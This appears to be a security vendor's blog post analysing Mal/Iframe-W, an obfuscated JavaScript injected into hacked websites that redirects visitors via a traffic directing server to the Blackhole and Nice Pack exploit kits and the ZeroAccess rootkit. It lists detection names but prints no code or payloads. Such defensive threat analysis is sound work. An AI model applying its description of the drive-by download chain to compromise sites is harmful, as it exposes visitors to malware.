One of the most prevalent scripts we have been seen used to compromise legitimate web sites over the past few months is something our products block as Mal/Iframe-W. The threat name describes the payload – some iframe, to load content from a remote site. In this blog, I will elaborate a little more on the threat, and how it is being used to infect users.
The JavaScript that is injected into legitimate sites is heavily obfuscated. Depending upon exactly how the site has been hacked, the script may be injected anywhere within the page. In the following example, it has been injected at the end of the page.
The script obfuscation uses a variety of anti-emulation tricks, in an attempt to evade generic detection, and break automated analysis systems.
Once deobfuscated, the script payload is obvious: an iframe to load further malicious content.
Hoards of sites, all over the world, have been hit in these site defacements. Last week, their victims included the French site of a global car manufacturer. (Following our notification to them, the site has now been cleaned up thankfully.)
Historically, Mal/Iframe-W has been use to drive traffic to Blackhole exploit sites (similar to here), in order to infect users with a variety of payloads.
In the last couple of weeks however, I have seen Mal/Iframe-W being used to send traffic to a different exploit kit – one known as ‘Nice Pack’. The attack is being used to infect users with a threat called ZeroAccess, a nasty rootkit.
As you can see, protection from these attacks is achieved at multiple levels:
- tracking the threat enables us to blacklist all sites known to be associated with this attack
- blocking of compromised web pages as Mal/Iframe-W
- blocking of the TDS redirect script as Mal/Iframe-W
- blocking of the Nice Pack exploit site as Mal/ExpJS-Y
- ZeroAccess dropper is detected as Troj/Sirefef-P, or generically as Mal/FakeAV-IS
Of course, exploit kits are typically distinct from the payloads they are being used to infect users with. It is the familiar drive-by download model, where hackers looking to infect users with some specific malware simply:
- purchase the kit to construct and manage the exploit site
- purchase the user traffic
- profit from users who get infected with their malware
The traffic directing server (TDS) illustrated in the above flowchart, emphasises how the user traffic is a commodity. This server is under the hacker’s control, and so by injecting legitimate sites such that they connect to the TDS, the hacker is able to control the final destination of that traffic. It can be sold to other hackers, who own and manage the exploit sites.
Leave a reply
